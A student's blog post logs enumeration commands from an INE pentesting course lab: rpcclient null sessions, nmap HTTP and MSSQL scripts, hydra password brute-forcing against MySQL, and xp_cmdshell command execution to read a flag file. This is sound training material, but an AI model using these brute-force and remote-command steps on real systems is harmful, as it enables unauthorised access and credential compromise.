INE Pentesting Student Section 1.3

·

, ,

·

2 min read

·

21 views

Updated May 24, 2026

Assessment Methodologies: Enumeration

This update has been a long time coming! It took a long time to get through this section, not because it’s intensive, it’s actually not at all, but because I had so much going on. Work has been really, really busy!

1.3 is broken into 5 protocols that I learned how to use enumeration on.

  1. SMB
  2. FTP
  3. SSH
  4. HTTP
  5. SQL

Some of the tools used a lot in this section were Metasploit, smbclient, smbmap, nmap scripts for smb.

Some of the cool commands that I got to run:

IPC null session – connect to it rpcclient -U “” -N IPADDR

nmap –script http-enum -sV -p 80 10.0.28.146

nmap –script http-headers -sV -p 80 10.0.28.146

nmap –script http-methods –script-args http-methods.url-path=/webdav/ 10.0.28.146

nmap –script http-webdav-scan –script-args http-methods.url-path=/webdav/ 10.0.28.146

nmap -sV -script banner 192.30.247.3

hydra -l root -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt 192.149.194.3 mysql

nmap -p 1433 –script ms-sql-ntlm-info –script-args mssql.instance-port=1433 10.0.30.33

nmap -p 1433 –script ms-sql-brute –script-args userdb=/root/Desktop/wordlist/common_users.txt,passdb=/root/Desktop/wordlist/100-common-p asswords.txt 10.0.30.33

nmap -p 1433 –script ms-sql-empty-password 10.0.30.33

nmap -p 1433 –script ms-sql-query –script-args mssql.username=admin,mssql.password=password,ms-sql-query.query=”SELECT * FROM master..syslogins” 10.0.30.33 -oN output.txt gvim output.txt

: nmap -p 1433 –script ms-sql-xp-cmdshell –script-args mssql.username=admin,mssql.password=password,ms-sql-xp-cmdshell.cmd=”ipconfig” 10.0.30.33

nmap -p 1433 –script ms-sql-xp-cmdshell –script-args mssql.username=admin,mssql.password=password,ms-sql-xp-cmdshell.cmd=”type c:\flag.txt” 10.0.30.33

I’ll add these to my tool bag for future use.

I believe this section is laying the groundwork for future lessons. Very basic and very light introductions into enumerating these protocols. On to section 1.4.

Share

Discover more from shane.blog

Subscribe to get the latest posts sent to your email.



you are visitor #19,290